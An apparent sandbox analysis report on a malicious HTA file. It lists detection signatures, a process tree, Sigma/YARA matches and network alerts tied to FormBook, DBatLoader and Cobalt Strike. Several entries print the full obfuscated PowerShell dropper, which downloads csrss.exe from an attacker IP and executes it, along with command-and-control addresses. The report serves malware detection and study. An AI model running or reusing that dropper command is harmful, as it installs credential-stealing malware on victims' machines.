Windows Analysis Report
fgd.hta

Overview

General Information

Sample name: fgd.hta
Analysis ID: 1664904
MD5: f7bb185c10824ee3f3706749b37e969b
SHA1: 844dd7341ee1c10964702470013e6910cdeda945
SHA256: cac32941d0d9176a10b105459e893c126b3617318f4f2c6a67501d7b313df8f3
Tags: 192-3-26-143, hta, user-skocherhan

Detection

Cobalt Strike, DBatLoader, FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Detected Cobalt Strike Beacon
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected FormBook
Yara detected Powershell decode and execute
Allocates many large memory junks
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Parents
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 3372 cmdline: mshta.exe "C:\Users\user\Desktop\fgd.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 4480 cmdline: "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2424 cmdline: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7248 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F1A.tmp" "c:\Users\user\AppData\Local\Temp\z0uhqkog\CSCA33479D5CCDF488DBD48FF689C9305B.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • csrss.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Roaming\csrss.exe" MD5: 848EBACD95EAD54CDCFE5D916093D2C8)
          • cmd.exe (PID: 7728 cmdline: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7776 cmdline: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\37991.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 7848 cmdline: ping 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
          • iaoqralA.pif (PID: 7840 cmdline: C:\\Users\\user\\Links\iaoqralA.pif MD5: C116D3604CEAFE7057D77FF27552C215)
            • 4nHrKBXqqqVJFZFp.exe (PID: 5660 cmdline: "C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\wgDVT7rL.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • systeminfo.exe (PID: 8116 cmdline: "C:\Windows\SysWOW64\systeminfo.exe" MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
                • 4nHrKBXqqqVJFZFp.exe (PID: 2620 cmdline: "C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\7rPkWXE1JEx.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
                • firefox.exe (PID: 7240 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • svchost.exe (PID: 6920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000016.00000002.3629881400.0000000005360000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000015.00000002.3625364823.0000000002400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000015.00000002.3627870487.0000000004070000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000015.00000002.3627956403.00000000040C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000011.00000002.1583072891.0000000035BE0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author
17.2.iaoqralA.pif.400000.1.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
12.2.csrss.exe.3800000.3.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
12.2.csrss.exe.2856178.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
12.2.csrss.exe.2856178.0.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
17.2.iaoqralA.pif.400000.1.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author
amsi32_2424.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security

System Summary

Source: File created; Author: frack113, Nasreddine Bencherchali; Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 7676, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2424, TargetFilename: C:\Users\user\AppData\Roaming\csrss.exe
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; 
iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGF
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ParentImage: C:\Users\user\AppData\Roaming\csrss.exe, ParentProcessId: 7676, ParentProcessName: csrss.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, ProcessId: 7728, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\csrss.exe, NewProcessName: C:\Users\user\AppData\Roaming\csrss.exe, OriginalFileName: C:\Users\user\AppData\Roaming\csrss.exe, ParentCommandLine: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ProcessId: 7676, ProcessName: csrss.exe
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\csrss.exe, ProcessId: 7676, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", ProcessId: 7232, ProcessName: csc.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: C:\\Users\\user\\Links\iaoqralA.pif, CommandLine: C:\\Users\\user\\Links\iaoqralA.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\Links\iaoqralA.pif, NewProcessName: C:\Users\user\Links\iaoqralA.pif, OriginalFileName: C:\Users\user\Links\iaoqralA.pif, ParentCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ParentImage: C:\Users\user\AppData\Roaming\csrss.exe, ParentProcessId: 7676, ParentProcessName: csrss.exe, ProcessCommandLine: C:\\Users\\user\\Links\iaoqralA.pif, ProcessId: 7840, ProcessName: iaoqralA.pif
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2424, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csrss[1].exe
Source: Process started; Author: Tim Rauch; Data: Command: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\csrss.exe" , ParentImage: C:\Users\user\AppData\Roaming\csrss.exe, ParentProcessId: 7676, ParentProcessName: csrss.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd, ProcessId: 7728, ProcessName: cmd.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2424, TargetFilename: C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))", CommandLine: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkx
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6920, ProcessName: svchost.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'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'+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline", ProcessId: 7232, ProcessName: csc.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-14T23:12:09.366509+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49725 | 192.197.113.156 | 80 | TCP
2025-04-14T23:12:41.123738+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 13.248.169.48 | 80 | TCP
2025-04-14T23:12:54.853195+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 209.74.80.150 | 80 | TCP
2025-04-14T23:13:09.947822+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 38.181.35.142 | 80 | TCP
2025-04-14T23:13:31.821216+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 172.67.207.82 | 80 | TCP
2025-04-14T23:13:51.331799+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 13.248.169.48 | 80 | TCP
2025-04-14T23:14:07.860712+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 13.248.169.48 | 80 | TCP
2025-04-14T23:14:22.075458+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49754 | 104.21.41.226 | 80 | TCP
2025-04-14T23:14:35.473738+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49758 | 3.33.130.190 | 80 | TCP
2025-04-14T23:14:49.566183+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49762 | 104.21.33.132 | 80 | TCP
2025-04-14T23:15:03.045223+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49766 | 13.248.169.48 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-14T23:11:22.059321+0200 | 2022050 | 1 | A Network Trojan was detected | 192.3.26.143 | 80 | 192.168.2.4 | 49714 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-14T23:11:22.335287+0200 | 2022051 | 1 | A Network Trojan was detected | 192.3.26.143 | 80 | 192.168.2.4 | 49714 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-14T23:12:09.366509+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49725 | 192.197.113.156 | 80 | TCP
2025-04-14T23:12:41.123738+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 13.248.169.48 | 80 | TCP
2025-04-14T23:12:54.853195+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 209.74.80.150 | 80 | TCP
2025-04-14T23:13:09.947822+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 38.181.35.142 | 80 | TCP
2025-04-14T23:13:31.821216+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 172.67.207.82 | 80 | TCP
2025-04-14T23:13:51.331799+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 13.248.169.48 | 80 | TCP
2025-04-14T23:14:07.860712+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 13.248.169.48 | 80 | TCP
2025-04-14T23:14:22.075458+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 104.21.41.226 | 80 | TCP
2025-04-14T23:14:35.473738+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 3.33.130.190 | 80 | TCP
2025-04-14T23:14:49.566183+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49762 | 104.21.33.132 | 80 | TCP
2025-04-14T23:15:03.045223+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49766 | 13.248.169.48 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-14T23:12:33.083914+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49727 | 13.248.169.48 | 80 | TCP
